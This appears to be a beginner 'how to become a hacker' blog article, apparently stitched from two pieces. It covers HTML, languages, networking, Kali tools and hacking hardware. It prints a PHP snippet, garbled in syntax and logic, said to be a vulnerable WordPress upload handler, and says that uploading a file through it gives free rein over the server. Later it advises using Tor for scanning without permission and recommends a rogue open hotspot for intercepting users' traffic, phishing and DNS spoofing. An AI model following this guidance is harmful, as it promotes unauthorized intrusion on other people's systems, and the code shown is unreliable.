    If you are not yet familiar with programming, then I don’t even understand what you are doing on this site then you have a great opportunity to start your journey by learning Hyper Text Mark-Up Language. No matter what you see on the site, know that it is all HTML.

    Let me give you an example using HTML, even if it is a little related to PHP. At the beginning of 2015, a vulnerability was discovered in WordPress theme, which allows you to upload derivative (executive) files to the server. The file in which the vulnerability was found is admin/upload-file.php. Here it is:

    //Upload Security

    $upload_security = md5 ($_SERVER [ "SERVER_ADDR" ] ) ;

    $uploaddir = "../uploads/" ;

    if ($_FILES) :

    foreach ($_FILES as $file ) :

    $file = $uploaddir . basename($file["name"]);

    if (move_uploaded_file ($_FILES [ $upload_security ] [ "tmp_name" ] , $file ) ) (

    echo "success" ;

    ) else (

    echo "error" . $_FILES [ $upload_security ] [ "tmp_name" ] ;

    endforeach ;

    endif ;

    To make a submission form for this file, you need to know HTML. By sending a file that, for example, retrieves all passwords or gives access to a database, you are free to do whatever you want with the web service.

    So, knowledge of HTML is needed in order to:

    1. Look for web resource vulnerabilities.
    2. Exploit these vulnerabilities.

    Learn several programming languages

    As we all know, in order to break the rules, you first need to know them. The same principle works for programming: to break someone's code, you must know how programming languages ​​work and be able to program yourself. Some of the most recommended languages ​​for learning:

    • Python: it is perhaps the best language for web development. Two large frameworks are written on it, on which a huge number of web applications have been created, these are Flask and Django. The language is well constructed and documented. The most important thing is that it is very easy to learn. By the way, many developers use Python to create simple and complete automation.
    • C++: a language used in industrial programming. It is taught in schools and universities. Servers are written on it. I recommend starting to learn languages ​​with it, because it contains all the principles of OOP. Once you learn to work with it, you can easily master other languages.
    • JavaScript, JQuery: Basically, almost all websites use JS and JQuery. You need to know that these sites depend on JS, for example, forms for entering passwords. After all, some sites do not allow you to select and copy some information, do not allow you to download a file or view the content, however, to do this, you just need to disable JS in the browser. Well, to disable JavaScript, you need to know: a) in what situations the operation (protection) of the site depends on it; b) how JavaScript is connected and in what ways can scripts be blocked.
    • SQL: the most interesting thing. All passwords and personal data are stored in databases written in SQL. The most common database management system is MySQL. To understand how to use MySQL injection, you need to know what MySQL injection is. To understand the essence of MySQL injection, you need to know what MySQL queries are, what the syntax of these queries is, what the database structure is, how data is stored, what tables are, etc.

    Explore network devices

    You must clearly understand networking and how it works if you want to become a hacker. It is important to understand how networks are created, to understand the difference between the TCP/IP and UDP protocols, etc. Find out what network you are using. Learn how to set it up. Understand possible attack vectors.

    With in-depth knowledge of various networks, you will be able to exploit their vulnerabilities. You also need to understand the design and operation of the web server and website.

    Explore

    This is an integral part of learning. It is necessary to understand the algorithms of various ciphers, for example, SHA-512, OpenSSL algorithm, etc. You also need to understand hashing. Cryptography is used everywhere: passwords, bank cards, cryptocurrencies, trading platforms, etc.

    Kali Linux: some useful software

    • NMAP:- Nmap (“Network Mapper”) is a free open-source program that comes pre-installed with Kali. Written by Gordon Lyon (also known as Fyodor Vaskovich). It is needed to discover hosts and various services, thus creating a “network map”. It is used for network scanning or security auditing, to quickly scan large networks, although it works fine with single hosts. The software provides a number of features for computer network exploration, including host and operating system detection. Nmap uses raw IP packets to determine what hosts are available on the network, what services (application name and version) these hosts offer, what OSes they run, what types of packet filters/firewalls they use, and dozens of other characteristics.
    • Aircrack-Ng:- Aircrack is one of the most popular programs for cracking the WEP/WPA/WPA2 protocol. The Aircrack-ng suite contains tools for capturing packets and handshakes, deauthorizing connected users, traffic generation, and tools for network brute force and dictionary attacks.

    Conclusion

    In this article, we have covered the basics, without which you are unlikely to become a hacker. Speaking of employment. As a rule, people involved in information security either work as freelancers, fulfilling orders from individuals, or work for a company, ensuring the security of stored data, perform the work of a system administrator, etc.

    Do you want to become a hacker? First, you need to decide what you will work on. In this article we will tell you how to choose a computer and OS.

    Iron

    What should a hacker's computer be like?

    A computer is a must, but don't look for a super-cool gaming PC with unnecessary bells and whistles unless you're going to turn it into a mining rig or load up the memory with character-by-character hash-breaking. In this case, it is desirable to have both a stationary and portable device.

    But what about additional devices?

    A specially configured router capable of intercepting open traffic under the guise of an open hotspot. Just imagine how many users use Wi-Fi, how popular it is nowadays, and how it can be used. Such a hotspot can be installed on a regular laptop, but it is also worth paying attention to the special WiFi device Pineapple, designed specifically for this and with a bunch of useful utilities: URLSnarf, DNS Spoof, etc.

    A unique gadget for radio amateurs and enthusiasts. HackRF allows both receiving and transmitting radio signals in the range from 1 MHz to 6 GHz with a bandwidth of up to 20 MHz.

    Performs Bluetooth broadcast analysis. It is installed in a computer USB connector and runs on an ARM Cortex-M3 Processor. It works in omnivorous mode, that is, the device can catch absolutely everything that is transmitted over a wireless network.

    Video card for pentest

    In information security, a video card is used to brute force hashes. Hash is the result of data processing by a hash function. They allow you to replace data that is unsafe to store in clear text. The same data has the same hash sum, but it is impossible to restore the original data from them.

    This feature is used, for example, on websites. Password hashes are stored there, and after you enter your data, these hashes are compared. If the hash of the entered password matches the previously saved one, you gain access. If a database with hashes somehow falls into the hands of a hacker, and he wants to log in using the login of one of the users, then it will not be possible to do this using a hash, because the site will require you to enter a password.

    As mentioned earlier, it is impossible to restore the original data from hash sums, but you can do brute force: take a password, read the hash sum for it and compare it with what we have. If they match, we have found the correct password. Otherwise, take another password and repeat the process.

    Can be done using a processor. There is a lot of special software. But it turned out that the video card copes with this task much faster. Enumeration using the GPU is thousands of times faster, which means the likelihood of hacking is also greater.

    AMD, GeForce and Intel HD Graphics video cards are very popular. However, Intel HD Graphics don't always work well.
    The main choice is between GeForce and AMD. The big disadvantage of AMD is that its drivers do not work well with some Linux distributions. Hashcat, for example, only supports AMDGPU-Pro, which works with newer video cards. So before purchasing AMD, check the list of supported Linux distributions.

    Why is it necessary to brute force hashes:

    • For penetration testing of web applications.
    • For hacking Wi-Fi.
    • To crack the password of encrypted files, storage media, wallets, documents.

    RAM

    It's better if there is plenty of RAM. Most programs will work fine even on a low-power computer, but pentesting in a virtual machine can put forward certain requirements.

    CPU

    If you are going to use a processor to brute force hashes, be aware that the more powerful the processor, the faster the brute force. In addition to this, a powerful processor will allow you to work quietly in virtual machines. But most programs, except those that perform brute force, do not have special processor requirements.

    Penetration tester computer on VPS/VDS

    VPS/VDS – virtual dedicated/private server – something like a virtual machine, but instead of running it, you rent resources from a hosting provider.
    Why spend money on something that you can do in VirtualBox absolutely free? VPS guarantees a constant Internet connection and many other important benefits.

    By the way, use Tor if you are doing vulnerability analysis or port scanning without permission.

    VPS will definitely come in handy in the following cases:

    • Website cloning.
    • Complete search (brute force).
    • Scanning applications for vulnerabilities and subnets.
    • Phishing.
    • DNS spoofing.

    Also, Virtual Private Server will allow you to organize a web server, mail server, cloud storage, VPN, etc.

    ARM computer

    This is a computer that is not very powerful, but also consumes little energy. It is useful if you need a computer for permanent work, without VPS and huge electricity bills.

    It is suitable for:

    • Sustained attacks.
    • Monitoring radio signals of various walkie-talkies, creating your own GSM base stations.
    • Proxy servers with Tor.

    operating system

    In general, you can work on both Windows and Linux. Most programs feel great on both operating systems. But those who use Linux have a number of advantages:

    1. Many distribution kits with specialized programs installed and configured. Yes, it takes time, but if you try to install and then configure them on Windows, fiddling with Linux will seem like a breeze.
    2. By working with Linux, you not only learn how to use it, but you also learn the purpose of pentesting.
    3. Number of instructions and other materials. Most books describe working with Linux.

    It is worth special attention - the most popular distribution in the field of computer security. It's a favorite of hackers.

    With Kali Linux, hacking becomes easier, because the user has a complete toolkit (over 300 pre-installed utilities) plus the ability to install additional programs.

    Read more: